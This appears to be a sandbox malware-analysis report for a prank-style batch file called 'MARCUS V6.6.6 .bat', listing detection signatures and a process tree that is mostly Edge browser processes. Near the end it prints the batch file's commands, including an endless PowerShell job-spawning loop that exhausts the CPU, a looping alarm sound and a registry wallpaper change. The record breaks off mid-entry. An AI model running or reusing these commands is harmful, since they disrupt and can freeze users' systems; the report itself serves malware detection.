Analysis

  • max time kernel
    154s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/05/2025, 10:53

General

  • Target

    https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file

Malware Config

Signatures

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

    Using powershell.exe command.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4436
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2a0,0x2d0,0x2c8,0x2d8,0x7fff2494f208,0x7fff2494f214,0x7fff2494f220
      2⤵
        PID:4852
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
        2⤵
          PID:1624
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:3
          2⤵
            PID:468
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2616,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:8
            2⤵
              PID:5024
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
              2⤵
                PID:184
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:1
                2⤵
                  PID:2100
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4248,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:1
                  2⤵
                    PID:5104
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4312,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:2
                    2⤵
                      PID:4340
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5128,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5088 /prefetch:8
                      2⤵
                        PID:4200
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8
                        2⤵
                          PID:3224
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=6088,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:1
                          2⤵
                            PID:3940
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5160,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5928 /prefetch:8
                            2⤵
                              PID:4296
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5936,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:8
                              2⤵
                                PID:4220
                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:8
                                2⤵
                                  PID:968
                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:8
                                  2⤵
                                    PID:3324
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6508 /prefetch:8
                                    2⤵
                                      PID:4164
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6516,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6544 /prefetch:8
                                      2⤵
                                        PID:1668
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6912,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:8
                                        2⤵
                                          PID:4928
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8
                                          2⤵
                                            PID:2032
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:8
                                            2⤵
                                              PID:1264
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6720 /prefetch:8
                                              2⤵
                                                PID:1144
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7244,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7252 /prefetch:8
                                                2⤵
                                                  PID:3568
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:8
                                                  2⤵
                                                    PID:888
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=4268,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:1
                                                    2⤵
                                                      PID:5636
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7060 /prefetch:1
                                                      2⤵
                                                        PID:5996
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:1
                                                        2⤵
                                                          PID:6016
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=7352,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7292 /prefetch:1
                                                          2⤵
                                                            PID:4204
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7120,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6808 /prefetch:1
                                                            2⤵
                                                              PID:2600
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=7416,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6608 /prefetch:1
                                                              2⤵
                                                                PID:2292
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7568,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7504 /prefetch:1
                                                                2⤵
                                                                  PID:5184
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=7196,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:1
                                                                  2⤵
                                                                    PID:5572
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=7176,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:1
                                                                    2⤵
                                                                      PID:4948
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:8
                                                                      2⤵
                                                                        PID:5864
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=4232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7744 /prefetch:1
                                                                        2⤵
                                                                          PID:5872
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8120 /prefetch:8
                                                                          2⤵
                                                                            PID:5888
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=4276,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3468 /prefetch:1
                                                                            2⤵
                                                                              PID:5124
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7728,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8008 /prefetch:1
                                                                              2⤵
                                                                                PID:6084
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=8232,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=8240 /prefetch:1
                                                                                2⤵
                                                                                  PID:5892
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4504,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:8
                                                                                  2⤵
                                                                                    PID:5224
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4556 /prefetch:8
                                                                                    2⤵
                                                                                      PID:5064
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7684,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:8
                                                                                      2⤵
                                                                                        PID:3172
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7732,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:8
                                                                                        2⤵
                                                                                          PID:6428
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                        1⤵
                                                                                          PID:3232
                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                          1⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:5344
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                          1⤵
                                                                                            PID:5104
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              chcp 1250
                                                                                              2⤵
                                                                                                PID:5424
                                                                                              • C:\Windows\system32\mode.com
                                                                                                mode 85,30
                                                                                                2⤵
                                                                                                  PID:5700
                                                                                                • C:\Windows\system32\wscript.exe
                                                                                                  wscript.exe "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat?.WSF//Job:Nyan"
                                                                                                  2⤵
                                                                                                    PID:876
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -c "(New-Object Media.SoundPlayer 'C:\Windows\Media\alarm.mp3').PlayLooping()"
                                                                                                    2⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4360
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\magnus\matrix.bmp" /f
                                                                                                    2⤵
                                                                                                    • Sets desktop wallpaper using registry
                                                                                                    PID:3120
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -c "while(1) { Start-Job -ScriptBlock { while(1) { [Math]::Pow([Math]::PI, [Math]::E) } } }"
                                                                                                    2⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3968
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5600
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5168
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:6088
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5216
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5192
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4452
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5164
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5416
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1620
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                      3⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:5428
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
